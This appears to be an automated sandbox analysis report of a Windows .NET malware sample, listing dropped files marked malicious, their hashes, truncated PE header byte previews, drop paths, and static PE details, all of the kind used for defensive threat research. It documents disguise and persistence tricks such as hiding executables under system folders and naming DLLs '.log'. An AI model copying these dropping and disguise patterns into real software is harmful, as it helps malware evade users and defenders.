                                                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                        C:\Users\user\Desktop\tmGCYmXQ.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):33280
                                                                                        Entropy (8bit):5.634433516692816
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\twjrRmqB.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):23552
                                                                                        Entropy (8bit):5.529329139831718
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\ucDhZRLu.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):69632
                                                                                        Entropy (8bit):5.932541123129161
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                        C:\Users\user\Desktop\udiCoAET.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):32768
                                                                                        Entropy (8bit):5.645950918301459
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\uuKznmFw.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):342528
                                                                                        Entropy (8bit):6.170134230759619
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\wFqSLbvP.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):38912
                                                                                        Entropy (8bit):5.679286635687991
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\xLpaQOdH.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):64000
                                                                                        Entropy (8bit):5.857602289000348
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\xfqPuAPp.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):46592
                                                                                        Entropy (8bit):5.870612048031897
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\yUQAQjKk.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):36352
                                                                                        Entropy (8bit):5.668291349855899
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\zhcyQjUk.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):33792
                                                                                        Entropy (8bit):5.541771649974822
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Windows\INF\.NET CLR Data\78fe9fe6f28b21

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:ASCII text, with very long lines (831), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):831
                                                                                        Entropy (8bit):5.915788317028199
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:83Rsev5RJ2kkME+fgcyVSDN16nWSS8hwdVkl6Fgeq:URs63kM/f4VSRYWSSEwrO5
                                                                                        MD5:0ED72F0DE762207F49967D0570B0CAA2
                                                                                        SHA1:AF64AC7AF172082A362CB269A8CD30E56F14DFC8
                                                                                        SHA-256:75CD8F2B9FA0C942F02167EA88256F1BF788447BF4AA50BEE88651DA60A09189
                                                                                        SHA-512:237CECEFBB805C8FC21722E00B84943188B3A925E78DC4C6FBE2CB6D0ACA9EF93129D1DA810707BFC964094B8DD7D2DCE426BD1E4D81CEAFF8A7997EA630872A
                                                                                        Malicious:false
                                                                                        Preview:NaLDpwXmdfKaZsS7tM2O0jORRn6bUdMbtqPztYpYj0CmcaDeziKJex8nM3vC05R9SsrtdcOVhdoAhlz1kblvSC75rlnzmniniCTttTBWUzmAJ8GkE4bYUgqQuwC2zYs45BbeRFIQaOada7wseDvsLKSCVD86RJh5GsFIgmS8wL7FFN0xATXwnAsusZIOHL9RqfXs1oM2uw6ANM6IMK68vvRF9UZGdD1kLpZk0I6WGfB1EshfdAC6OAg5NRshOFYq4VyhxVSDOk1PuaBRw4ncB5WKJdXiZYHBHU6t3ArHs8rnJQLxPbuTc5p98nXT8tn0d0IZdSXvMfuCNtB2SjS8nxiLp7uPmXJ9U1KTIvT7D8H7LnvOmfBYapMpR7ughIJzWvrWjrtgQV4oqk9BLfmHWuipoeBLBxa5zRka5Zp4veIFuh8r7sUBfBdlMCrEqifc49zY9iGv0sV1lc4HgUNTcZayy9O3rlON9pLusjrZmiLxplAtHkiWVL9fjAkAUNEOdI25RJY6nyr4NmIN8evHD22xqpLr9qEYe6ThsEb7MlsgeFR62XC0b7LlQFPm8q77tSZRTke4Cy4bJVSkXOyloO7hurQnyz9fovxMqAmR2HxmCuc5woOt1VTeU1gmU1FNzZwXhG4XmhtgbUfAPV0JkPnTcS1ydA7BBjxm7EXqu0HUmwDAWfW8B5mjvc5POF3ljre1g2CK8JZtITrpP1c8o8AF6O1eJIbo7gu4RLdddMA1g3bcvP9Xn57krZ5SBhBzrvwliwYEY8eb8IjDwZt3IEBBjJN2QKc5KKKvGz38158oafmjz1glyHrmuuCYjfy

                                                                                        C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):3823616
                                                                                        Entropy (8bit):7.833671064349166
                                                                                        Encrypted:false
                                                                                        SSDEEP:98304:g2Bl6PH1SpUiDnkFcbxHgsHZ5QXZQjS4CTWixanZ4+PLXxyaBGE:gqlofir0cb9gsHZypQu47ixanZ4KLXTg
                                                                                        MD5:529B29E8BCEF9CC790F7C61F40D44B39
                                                                                        SHA1:094A6C81F7A116D2099790DE3E7CD6449F1BB834
                                                                                        SHA-256:A9249873D68391DCDD604B5332C1F3EE1BE4303FF5BA8E83147FBAB20F87DE88
                                                                                        SHA-512:240D6DE89491ACC5229AFAC34579FE9A1D159D39A9DEDA72EAAF3BA73C31B45BE04E598CBFE31CA38817832E0208ADF8F3E5A7A59A56AF642A5B602748A431AC
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................P:..........o:.. ....:...@.. ........................:...........@.................................po:.K.....:.p.....................:...................................................... ............... ..H............text....O:.. ...P:................. ..`.rsrc...p.....:......R:.............@....reloc........:......V:.............@..B.................o:.....H.......4..........j......../..n:......................................0..........(.... ........8........E................9...8....(.... ....8....*(.... ....~....{....9....& ....8....(.... ....~....{f...:....& ....8........0..)....... ........8........E........k...............*...8.......... ....~....{....:....& ....8........~....(@...~....(D... ....?S... ....~....{z...:....& ....8x...~....9.... ....~....{....9Z...& ....8O...r...ps....z*8.... ....~....{c...:*...& ....8....~

                                                                                        C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe:Zone.Identifier

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):26
                                                                                        Entropy (8bit):3.95006375643621
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                        Malicious:false
                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):55
                                                                                        Entropy (8bit):4.306461250274409
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                        Malicious:false
                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                        \Device\Null

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\PING.EXE
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):502
                                                                                        Entropy (8bit):4.613055660879929
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:Pr5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:FdUOAokItULVDv
                                                                                        MD5:A5878D417412D799FC6568ECAAF22AE5
                                                                                        SHA1:C230E7B847EB2F031DD62BC7FE3AA9675241B511
                                                                                        SHA-256:ABFFDB8C96B132C0E87D94C48C5E9EE24441A9619D5E5D2C47B463A92ED28451
                                                                                        SHA-512:3842F1D690C0104FDD6C3130E6325B5AACE66FE8E132B6E7568CA0277F7B15B26FD471E33C1618411C2FDC6CD11016067B37F403EC67BCE574DE5E321BFB7B8B
                                                                                        Malicious:false
                                                                                        Preview:..Pinging 813848 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):7.833671064349166
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        File name:3XtEci4Mmo.exe
                                                                                        File size:3'823'616 bytes
                                                                                        MD5:529b29e8bcef9cc790f7c61f40d44b39
                                                                                        SHA1:094a6c81f7a116d2099790de3e7cd6449f1bb834
                                                                                        SHA256:a9249873d68391dcdd604b5332c1f3ee1be4303ff5ba8e83147fbab20f87de88
                                                                                        SHA512:240d6de89491acc5229afac34579fe9a1d159d39a9deda72eaaf3ba73c31b45be04e598cbfe31ca38817832e0208adf8f3e5a7a59a56af642a5b602748a431ac
                                                                                        SSDEEP:98304:g2Bl6PH1SpUiDnkFcbxHgsHZ5QXZQjS4CTWixanZ4+PLXxyaBGE:gqlofir0cb9gsHZypQu47ixanZ4KLXTg
                                                                                        TLSH:8E06E1066AA25E73C6A47F35C4D7002E42B1DA36B952EF0B391F71F1AD162308F661B7
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................P:..........o:.. ....:...@.. ........................:...........@................................

                                                                                        File Icon

                                                                                        Icon Hash:90cececece8e8eb0

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x7a6fbe
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al

